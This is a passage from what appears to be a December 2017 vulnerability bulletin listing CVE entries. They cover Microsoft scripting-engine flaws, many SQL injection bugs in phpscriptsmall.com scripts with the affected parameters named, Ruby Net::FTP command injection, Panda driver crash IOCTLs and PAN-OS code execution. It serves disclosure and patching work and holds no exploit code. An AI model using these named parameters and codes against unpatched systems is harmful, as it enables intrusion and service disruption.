Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11890
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11889
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11909
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11910
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11908
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11914
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, and CVE-2017-11916.2017-12-12not yet calculatedCVE-2017-11930
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11905
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 		ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016, and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11906.2017-12-12not yet calculatedCVE-2017-11919
BID
SECTRACK
CONFIRM
microsoft -- office_2016_click-to-run
 		Microsoft Office 2016 Click-to-Run (C2R) allows a remote code execution vulnerability due to the way files are handled in memory, aka "Microsoft Excel Remote Code Execution Vulnerability".2017-12-12not yet calculatedCVE-2017-11935
BID
SECTRACK
CONFIRM
microsoft -- office_2016_click-to-run
 		Microsoft Office 2016 Click-to-Run (C2R) allows an information disclosure vulnerability due to the way Microsoft Office enforces DRM copy/paste permissions, aka "Microsoft Office Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11939
BID
SECTRACK
CONFIRM
microsoft -- office
 		Microsoft Office 2013 RT SP1, Microsoft Office 2013 SP1, and Microsoft Office 2016 allow an information disclosure vulnerability due to the way certain functions handle objects in memory, aka "Microsoft Office Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11934
BID
SECTRACK
CONFIRM
microsoft -- sharepoint_enterprise_server_2016
 		Microsoft SharePoint Enterprise Server 2016 allows an elevation of privilege vulnerability due to the way web requests are handled, aka "Microsoft SharePoint Elevation of Privilege Vulnerability".2017-12-12not yet calculatedCVE-2017-11936
BID
SECTRACK
CONFIRM

microsoft -- windows

Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka "Windows RRAS Service Remote Code Execution Vulnerability".2017-12-12not yet calculatedCVE-2017-11885
BID
SECTRACK
CONFIRM

microsoft -- windows

Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11886
BID
SECTRACK
CONFIRM
microsoft -- windows
 		Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an information vulnerability due to the way the Windows its:// protocol handler determines the zone of a request, aka "Microsoft Windows Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11927
BID
SECTRACK
CONFIRM
mikrotik -- multiple_devices
 		MikroTik v6.40.5 devices allow remote attackers to cause a denial of service via a flood of ICMP packets.2017-12-13not yet calculatedCVE-2017-17538
EXPLOIT-DB
mikrotik -- routerboard
 		MikroTik RouterBOARD v6.39.2 and v6.40.5 allows an unauthenticated remote attacker to cause a denial of service by connecting to TCP port 53 and sending data that begins with many '\0' characters, possibly related to DNS.2017-12-13not yet calculatedCVE-2017-17537
EXPLOIT-DB
mobotap -- dolphin_browser_for_android
 		The Backup and Restore feature in Mobotap Dolphin Browser for Android 12.0.2 suffers from an arbitrary file write vulnerability when attempting to restore browser settings from a malicious Dolphin Browser backup file. This arbitrary file write vulnerability allows an attacker to overwrite a specific executable in the Dolphin Browser's data directory with a crafted malicious executable. Every time the Dolphin Browser is launched, it will attempt to run the malicious executable from disk, thus executing the attacker's code.2017-12-11not yet calculatedCVE-2017-17551
MISC
mobotap -- dolphin_browser_for_android
 		The Dolphin Browser for Android 12.0.2 suffers from an insecure parsing implementation of the Intent URI scheme. This vulnerability could allow attackers to abuse this implementation through a malicious Intent URI, in order to invoke private Activities within the Dolphin Browser.2017-12-11not yet calculatedCVE-2017-17553
MISC
nip2 -- nip2
 		** DISPUTED ** boxes.c in nip2 8.4.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer indicates that this product does not use the BROWSER environment variable.2017-12-14not yet calculatedCVE-2017-17514
MISC
node.js -- node.js
 		Node.js was affected by OpenSSL vulnerability CVE-2017-3737 in regards to the use of SSL_read() due to TLS handshake failure. The result was that an active network attacker could send application data to Node.js using the TLS or HTTP2 modules in a way that bypassed TLS authentication and encryption.2017-12-11not yet calculatedCVE-2017-15896
CONFIRM
node.js -- node.js
 		Node.js had a bug in versions 8.X and 9.X which caused buffers to not be initialized when the encoding for the fill value did not match the encoding specified. For example, 'Buffer.alloc(0x100, "This is not correctly encoded", "hex");' The buffer implementation was updated such that the buffer will be initialized to all zeros in these cases.2017-12-11not yet calculatedCVE-2017-15897
CONFIRM
ocaml -- ocaml_batteries_included
 		batteriesConfig.mlp in OCaml Batteries Included (aka ocaml-batteries) 2.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17519
MISC
octopus -- octopus_deploy
 		In Octopus Deploy before 4.1.3, the machine update process doesn't check that the user has access to all environments. This allows an access-control bypass because the set of environments to which a machine is scoped may include environments in which the user lacks access.2017-12-13not yet calculatedCVE-2017-17665
CONFIRM
openstack -- openstack
 		A resource-permission flaw was found in the openstack-tripleo-heat-templates package where ceph.client.openstack.keyring is created as world-readable. A local attacker with access to the key could read or modify data on Ceph cluster pools for OpenStack as though the attacker were the OpenStack service, thus potentially reading or modifying data in an OpenStack Block Storage volume.2017-12-12not yet calculatedCVE-2017-12155
CONFIRM
CONFIRM
palo_alto_networks -- globalprotect_agent
 		Palo Alto Networks GlobalProtect Agent before 4.0.3 allows attackers with administration rights on the local station to gain SYSTEM privileges via vectors involving "image path execution hijacking."2017-12-11not yet calculatedCVE-2017-15870
BID
CONFIRM
palo_alto_networks -- pan-os
 		The configuration file import for applications, spyware and vulnerability objects functionality in the web interface in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, and 7.1.x before 7.1.14 allows remote attackers to conduct server-side request forgery (SSRF) attacks and consequently obtain sensitive information via vectors related to parsing of external entities.2017-12-11not yet calculatedCVE-2017-15943
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 		Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.13, and 8.0.x before 8.0.6 allows remote attackers to cause a denial of service via vectors related to the management interface.2017-12-11not yet calculatedCVE-2017-15942
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 		The web interface packet capture management component in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote authenticated users to execute arbitrary code via unspecified vectors.2017-12-11not yet calculatedCVE-2017-15940
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 		Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.2017-12-11not yet calculatedCVE-2017-15944
BID
SECTRACK
CONFIRM
panda_security -- panda_global_protection
 		Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c04 \\.\PSMEMDriver DeviceIoControl request.2017-12-14not yet calculatedCVE-2017-17684
MISC
panda_security -- panda_global_protection
 		Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c44 \\.\PSMEMDriver DeviceIoControl request.2017-12-14not yet calculatedCVE-2017-17683
MISC
pandora -- ios_app
 		Pandora iOS app prior to version 8.3.2 fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.2017-12-15not yet calculatedCVE-2017-3194
BID
MISC
CERT-VN
MISC
pasdoc -- pasdoc
 		** DISPUTED ** delphi_gui/WWWBrowserRunnerDM.pas in PasDoc 0.14 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer has indicated that the code referencing the BROWSER environment variable is never used.2017-12-14not yet calculatedCVE-2017-17527
MISC
pcausa -- rawether_framework
 		PCAUSA Rawether framework does not properly validate BPF data, allowing a crafted malicious BPF program to perform operations on memory outside of its typical bounds on the driver's receipt of network packets. Local attackers can exploit this issue to execute arbitrary code with SYSTEM privileges.2017-12-15not yet calculatedCVE-2017-3196
MISC
BID
MISC
CERT-VN
phabricator -- phabricator
 		Phabricator before 2017-11-10 does not block the --config and --debugger flags to the Mercurial hg program, which allows remote attackers to execute arbitrary code by using the web UI to browse a branch whose name begins with a --config= or --debugger= substring.2017-12-11not yet calculatedCVE-2017-17536
MISC
MISC
phoenix_contact -- fl_comserver
 		A Cross-site Scripting issue was discovered in PHOENIX CONTACT FL COMSERVER BASIC 232/422/485, FL COMSERVER UNI 232/422/485, FL COMSERVER BAS 232/422/485-T, FL COMSERVER UNI 232/422/485-T, FL COM SERVER RS232, FL COM SERVER RS485, and PSI-MODEM/ETH (running firmware versions prior to 1.99, 2.20, or 2.40). The cross-site scripting vulnerability has been identified, which may allow remote code execution.2017-12-11not yet calculatedCVE-2017-16723
BID
MISC
MISC
phpscriptsmall.com -- advance_b2b_script
 		Advance B2B Script 2.1.3 has SQL Injection via the tradeshow-list-detail.php show_id or view-product.php pid parameter.2017-12-13not yet calculatedCVE-2017-17602
MISC
phpscriptsmall.com -- advance_online_learning_managment_script
 		Advance Online Learning Management Script 3.1 has SQL Injection via the courselist.php subcatid or popcourseid parameter.2017-12-13not yet calculatedCVE-2017-17599
MISC
phpscriptsmall.com -- advanced_real_estate_script
 		Advanced Real Estate Script 4.0.7 has SQL Injection via the search-results.php Projectmain, proj_type, searchtext, sell_price, or maxprice parameter.2017-12-13not yet calculatedCVE-2017-17603
MISC
phpscriptsmall.com -- advanced_world_database
 		Advanced World Database 2.0.5 has SQL Injection via the city.php country or state parameter, or the state.php country parameter.2017-12-13not yet calculatedCVE-2017-17640
MISC
phpscriptsmall.com -- affiliate_mlm_script
 		Affiliate MLM Script 1.0 has SQL Injection via the product-category.php key parameter.2017-12-13not yet calculatedCVE-2017-17598
MISC
phpscriptsmall.com -- basic_b2b_script
 		Basic B2B Script 2.0.8 has SQL Injection via the product_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17600
MISC
phpscriptsmall.com -- beauty_parlour_booking_script
 		Beauty Parlour Booking Script 1.0 has SQL Injection via the /list gender or city parameter.2017-12-13not yet calculatedCVE-2017-17595
MISC
phpscriptsmall.com -- cab_booking_script
 		Cab Booking Script 1.0 has SQL Injection via the /service-list city parameter.2017-12-13not yet calculatedCVE-2017-17601
MISC
phpscriptsmall.com -- car_rental_script
 		Car Rental Script 2.0.4 has SQL Injection via the countrycode1.php val parameter.2017-12-13not yet calculatedCVE-2017-17637
MISC
phpscriptsmall.com -- chartered_accountant_booking_script
 		Chartered Accountant Booking Script 1.0 has SQL Injection via the /service-list city parameter.2017-12-13not yet calculatedCVE-2017-17609
MISC
phpscriptsmall.com -- child_care_script
 		Child Care Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17608
MISC
phpscriptsmall.com -- cms_auditor_website
 		CMS Auditor Website 1.0 has SQL Injection via the PATH_INFO to /news-detail.2017-12-13not yet calculatedCVE-2017-17607
MISC
phpscriptsmall.com -- co-work_space_search_script
 		Co-work Space Search Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17606
MISC
phpscriptsmall.com -- consumer_complaints_clone_script
 		Consumer Complaints Clone Script 1.0 has SQL Injection via the other-user-profile.php id parameter.2017-12-13not yet calculatedCVE-2017-17605
MISC
phpscriptsmall.com -- doctor_search_script

 		Doctor Search Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17611
MISC
phpscriptsmall.com -- domainsale_php_script
 		DomainSale PHP Script 1.0 has SQL Injection via the domain.php id parameter.2017-12-13not yet calculatedCVE-2017-17594
MISC
phpscriptsmall.com -- e-commerce_mlm_software

 		E-commerce MLM Software 1.0 has SQL Injection via the service_detail.php pid parameter, event_detail.php eventid parameter, or news_detail.php newid parameter.2017-12-13not yet calculatedCVE-2017-17610
MISC
phpscriptsmall.com -- entrepreneur_bus_booking_script
 		Entrepreneur Bus Booking Script 3.0.4 has SQL Injection via the booker_details.php sourcebus parameter.2017-12-13not yet calculatedCVE-2017-17604
MISC
phpscriptsmall.com -- entrepreneur_dating_script
 		Entrepreneur Dating Script 2.0.1 has SQL Injection via the search_result.php marital, gender, country, or profileid parameter.2017-12-13not yet calculatedCVE-2017-17648
EXPLOIT-DB
phpscriptsmall.com -- entrepreneur_job_portal_script
 		Entrepreneur Job Portal Script 2.0.6 has SQL Injection via the jobsearch_all.php rid1 parameter.2017-12-13not yet calculatedCVE-2017-17596
MISC
phpscriptsmall.com -- event_search_script
 		Event Search Script 1.0 has SQL Injection via the /event-list city parameter.2017-12-13not yet calculatedCVE-2017-17616
MISC

phpscriptsmall.com -- facebook_clone_script


 		Facebook Clone Script 1.0 has SQL Injection via the friend-profile.php id parameter.2017-12-13not yet calculatedCVE-2017-17615
MISC
phpscriptsmall.com -- food_order_script

 		Food Order Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17614
MISC
phpscriptsmall.com -- foodspotting_clone_script
 		Foodspotting Clone Script 1.0 has SQL Injection via the quicksearch.php q parameter.2017-12-13not yet calculatedCVE-2017-17617
MISC
phpscriptsmall.com -- freelance_website_script

 		Freelance Website Script 2.0.6 has SQL Injection via the jobdetails.php pr_id parameter or the searchbycat_list.php catid parameter.2017-12-13not yet calculatedCVE-2017-17613
MISC
phpscriptsmall.com -- groupon_clone_script
 		Groupon Clone Script 3.01 has SQL Injection via the city_ajax.php state_id parameter.2017-12-13not yet calculatedCVE-2017-17638
MISC
phpscriptsmall.com -- hot_scripts_clone
 		Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.2017-12-13not yet calculatedCVE-2017-17612
MISC
phpscriptsmall.com -- kickstarter_clone_script
 		Kickstarter Clone Script 2.0 has SQL Injection via the investcalc.php projid parameter.2017-12-13not yet calculatedCVE-2017-17618
MISC
phpscriptsmall.com -- laundry_booking_script
 		Laundry Booking Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17619
MISC
MISC
phpscriptsmall.com -- lawyer_search_script
 		Lawyer Search Script 1.1 has SQL Injection via the /lawyer-list city parameter.2017-12-13not yet calculatedCVE-2017-17620
MISC
phpscriptsmall.com -- mlm_forced_matrix
 		MLM Forced Matrix 2.0.9 has SQL Injection via the news-detail.php newid parameter.2017-12-13not yet calculatedCVE-2017-17636
MISC
phpscriptsmall.com -- mlm_forex_market_plan_script
 		MLM Forex Market Plan Script 2.0.4 has SQL Injection via the news_detail.php newid parameter or the event_detail.php eventid parameter.2017-12-13not yet calculatedCVE-2017-17635
MISC
phpscriptsmall.com -- multiplex_movie_theater_booking_script
 		Multiplex Movie Theater Booking Script 3.1.5 has SQL Injection via the trailer-detail.php moid parameter, show-time.php moid parameter, or event-detail.php eid parameter.2017-12-13not yet calculatedCVE-2017-17633
MISC
phpscriptsmall.com -- multireligion_responsive_matrimonial
 		Multireligion Responsive Matrimonial 4.7.2 has SQL Injection via the success-story.php succid parameter.2017-12-13not yet calculatedCVE-2017-17631
MISC
phpscriptsmall.com -- multivendor_penny_auction_clone_script
 		Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.2017-12-13not yet calculatedCVE-2017-17621
MISC
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 		Muslim Matrimonial Script 3.02 has SQL Injection via the success-story.php succid parameter.2017-12-13not yet calculatedCVE-2017-17639
MISC
phpscriptsmall.com -- nearbuy_clone_script
 		Nearbuy Clone Script 3.2 has SQL Injection via the category_list.php search parameter.2017-12-13not yet calculatedCVE-2017-17597
MISC
phpscriptsmall.com -- online_exam_test_application_script
 		Online Exam Test Application Script 1.6 has SQL Injection via the exams.php sort parameter.2017-12-13not yet calculatedCVE-2017-17622
MISC
MISC
phpscriptsmall.com -- opensource_classified_ads_script

 		Opensource Classified Ads Script 3.2 has SQL Injection via the advance_result.php keyword parameter.2017-12-13not yet calculatedCVE-2017-17623
MISC
phpscriptsmall.com -- php_multivendor_ecommerce
 		PHP Multivendor Ecommerce 1.0 has SQL Injection via the single_detail.php sid parameter, or the category.php searchcat or chid1 parameter.2017-12-13not yet calculatedCVE-2017-17624
MISC
phpscriptsmall.com -- professional_service_script
 		Professional Service Script 1.0 has SQL Injection via the service-list city parameter.2017-12-13not yet calculatedCVE-2017-17625
MISC
phpscriptsmall.com -- readymade_php_classified_script
 		Readymade PHP Classified Script 3.3 has SQL Injection via the /categories subctid or mctid parameter.2017-12-13not yet calculatedCVE-2017-17626
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 		Readymade Video Sharing Script 3.2 has SQL Injection via the single-video-detail.php report_videos array parameter.2017-12-13not yet calculatedCVE-2017-17627
MISC
phpscriptsmall.com -- responsive_events_and_movie_ticket_booking_scriptResponsive Events And Movie Ticket Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.2017-12-13not yet calculatedCVE-2017-17632
MISC
phpscriptsmall.com -- responsive_realestate_script
 		Responsive Realestate Script 3.2 has SQL Injection via the property-list tbud parameter.2017-12-13not yet calculatedCVE-2017-17628
MISC
phpscriptsmall.com -- resume_clone_script
 		Resume Clone Script 2.0.5 has SQL Injection via the preview.php id parameter.2017-12-13not yet calculatedCVE-2017-17641
MISC
phpscriptsmall.com -- secure_e-commerce_script
 		Secure E-commerce Script 2.0.1 has SQL Injection via the category.php searchmain or searchcat parameter, or the single_detail.php sid parameter.2017-12-13not yet calculatedCVE-2017-17629
MISC
phpscriptsmall.com -- single_theater_booking_script
 		Single Theater Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.2017-12-13not yet calculatedCVE-2017-17634
MISC
phpscriptsmall.com -- yoga_class_script
 		Yoga Class Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17630
MISC
phusion_passenger -- phusion_passenger
 		In agent/Core/SpawningKit/Spawner.h in Phusion Passenger 5.1.10 (fixed in Passenger Open Source 5.1.11 and Passenger Enterprise 5.1.10), if Passenger is running as root, it is possible to list the contents of arbitrary files on a system by symlinking a file named REVISION from the application root folder to a file of choice and querying passenger-status --show=xml.2017-12-14not yet calculatedCVE-2017-16355
CONFIRM
CONFIRM
posty -- readymade_classifieds_script
 		Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.2017-12-11not yet calculatedCVE-2017-17111
MISC
posty -- scubez_posty_readymade_classifieds
 		Scubez Posty Readymade Classifieds has SQL Injection via the admin/user_activate_submit.php ID parameter.2017-12-13not yet calculatedCVE-2017-17567
MISC
posty -- scubez_posty_readymade_classifieds
 		Scubez Posty Readymade Classifieds has XSS via the admin/user_activate_submit.php ID parameter.2017-12-13not yet calculatedCVE-2017-17569
MISC
posty -- scubez_posty_readymade_classifieds
 		Scubez Posty Readymade Classifieds has Incorrect Access Control for visiting admin/user_activate_submit.php (aka the backend PHP script), which might allow remote attackers to obtain sensitive information via a direct request.2017-12-13not yet calculatedCVE-2017-17568
MISC

ppm_2000 -- perspective_icm


 		Perspective ICM Investigation & Case 5.1.1.16 allows remote authenticated users to modify access level permissions and consequently gain privileges by leveraging insufficient validation methods and missing cross server side checking mechanisms.2017-12-11not yet calculatedCVE-2017-11319
MISC
puppet -- puppet_enterprise
 		Cross-site scripting (XSS) vulnerability in the console in Puppet Enterprise before 2015.2.1 allows remote attackers to inject arbitrary web script or HTML via the string parameter, related to Login Redirect.2017-12-11not yet calculatedCVE-2015-6502
CONFIRM
puppet -- puppet_enterprise

 		The console in Puppet Enterprise 3.7.x, 3.8.x, and 2015.2.x does not set the secure flag for the JSESSIONID cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.2017-12-11not yet calculatedCVE-2015-8470
CONFIRM
puppet -- puppetlabs-apache
 		The default vhost configuration file in Puppet before 3.6.2 does not include the SSLCARevocationCheck directive, which might allow remote attackers to obtain sensitive information via a revoked certificate when a Puppet master runs with Apache 2.4.2017-12-11not yet calculatedCVE-2014-3250
CONFIRM
CONFIRM
python -- python
 		Lib/webbrowser.py in Python through 3.6.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17522
MISC
qnap -- qsync_for_windows
 		A DLL Hijacking vulnerability in QNAP Qsync for Windows (exe) version 4.2.2.0724 and earlier could allow remote attackers to execute arbitrary code on Windows machines.2017-12-11not yet calculatedCVE-2017-13070
CONFIRM
qt_company -- qt_for_android
 		A vulnerability in applications created using Qt for Android prior to 5.9.3 allows attackers to alter environment variables via unspecified vectors.2017-12-15not yet calculatedCVE-2017-10905
CONFIRM
JVN
qt_company -- qt_for_android
 		Qt for Android prior to 5.9.0 allows remote attackers to execute arbitrary OS commands via unspecified vectors.2017-12-15not yet calculatedCVE-2017-10904
CONFIRM
JVN
radware -- alteon_devices
 		Radware Alteon devices with a firmware version between 31.0.0.0-31.0.3.0 are vulnerable to an adaptive-chosen ciphertext attack ("Bleichenbacher attack"). This allows an attacker to decrypt observed traffic that has been encrypted with the RSA cipher and to perform other private key operations.2017-12-13not yet calculatedCVE-2017-17427
BID
MISC
CONFIRM
CERT-VN
rapid7 -- nexpose
 		Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack.2017-12-14not yet calculatedCVE-2017-5264
CONFIRM
reddit -- reddit_terminal_viewer
 		scripts/inspect_webbrowser.py in Reddit Terminal Viewer (RTV) 1.19.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17516
MISC
ruby -- ruby
 		Ruby before 2.4.3 allows Net::FTP command injection. Net::FTP#get, getbinaryfile, gettextfile, put, putbinaryfile, and puttextfile use Kernel#open to open a local file. If the localfile argument starts with the "|" pipe character, the command following the pipe character is executed. The default value of localfile is File.basename(remotefile), so malicious FTP servers could cause arbitrary command execution.2017-12-15not yet calculatedCVE-2017-17405
CONFIRM
CONFIRM
sap -- business_intelligence_promotion_management_application
 		Cross-Site Scripting (XSS) vulnerability in SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, 4.30, as user controlled inputs are not sufficiently encoded.2017-12-12not yet calculatedCVE-2017-16681
BID
CONFIRM
CONFIRM
sap -- business_intelligence_promotion_management_application
 		SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, and 4.30, does not perform authentication checks for functionalities that require user identity.2017-12-12not yet calculatedCVE-2017-16684
BID
CONFIRM
CONFIRM
sap -- business_objects_platform
